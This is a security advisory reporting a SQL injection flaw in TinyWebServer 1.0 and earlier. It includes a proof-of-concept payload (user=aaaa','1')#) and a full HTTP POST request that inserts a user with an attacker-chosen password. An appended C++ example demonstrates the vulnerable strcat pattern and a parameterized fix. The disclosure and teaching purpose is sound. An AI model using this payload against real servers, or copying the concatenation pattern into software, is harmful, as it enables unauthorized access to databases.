BUG_Author: s0l42
Affected Version: TinyWebServer ≤ 1.0
Vendor: TinyWebServer GitHub Repository
Software: TinyWebServer
Vulnerability Files:
http/http_conn.cpp:426-431
A SQL injection was found in http/http_conn.cpp:426-431 of TinyWebServer ≤ 1.0. The code uses strcat to concatenate the user inputs name and password into the SQL INSERT statement without any check.
To prove the vulnerability, we input name and password as follows. If the user aaaa is inserted successfully and the password is 1 instead of 222, the vulnerability exists.
user=aaaa','1')#&password=222
POST /3CGISQL.cgi HTTP/1.1
Host: xxxx
Content-Length: 1015
Cache-Control: max-age=0
Origin: xxxx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

user=aaaa','1')#&password=222
If successful, a user aaaa is created and its password is set to 1.
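
The following C++ example is added here and is not TinyWebServer's code: it reproduces the strcat pattern described above with the advisory's input, shows the statement MySQL is left with once # starts a comment, and contrasts it with a parameterized statement. The table and column names, the function names and BoundInsert are assumptions made for illustration.

```cpp
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

// Concatenation pattern the advisory describes. Table and column names are
// assumptions for this example; the length guard only keeps the demo in bounds.
std::string build_insert_concat(const char *name, const char *password) {
    char sql[256] = "INSERT INTO user(username, passwd) VALUES('";
    if (std::strlen(sql) + std::strlen(name) + std::strlen(password) + 8 > sizeof(sql)) return "";
    std::strcat(sql, name);
    std::strcat(sql, "', '");
    std::strcat(sql, password);
    std::strcat(sql, "')");
    return sql;
}

// What MySQL executes: '#' outside a string literal starts a comment that
// runs to end of line, so everything after it is discarded.
std::string effective_statement(const std::string &sql) {
    bool in_quote = false;
    for (std::size_t i = 0; i < sql.size(); ++i) {
        if (in_quote && sql[i] == '\\') { ++i; continue; }  // skip escaped char
        if (sql[i] == '\'') in_quote = !in_quote;
        else if (sql[i] == '#' && !in_quote) return sql.substr(0, i);
    }
    return sql;
}

// Parameterized form: the statement text is constant and the inputs travel
// separately as bound values (with the MySQL C API: mysql_stmt_prepare and
// mysql_stmt_bind_param), so quotes in the input never reach the SQL parser.
struct BoundInsert { std::string sql; std::vector<std::string> params; };

BoundInsert build_insert_bound(const std::string &name, const std::string &password) {
    return {"INSERT INTO user(username, passwd) VALUES(?, ?)", {name, password}};
}

int main() {
    // Input taken from the advisory's request body.
    std::string q = build_insert_concat("aaaa','1')#", "222");
    std::cout << "concatenated: " << q << "\n";
    std::cout << "executed:     " << effective_statement(q) << "\n";
    std::cout << "bound text:   " << build_insert_bound("aaaa','1')#", "222").sql << "\n";
    return 0;
}
```

With the concatenated form the submitted password 222 falls inside the comment and never reaches the VALUES list; with bound parameters the whole name string, quotes included, is stored as data.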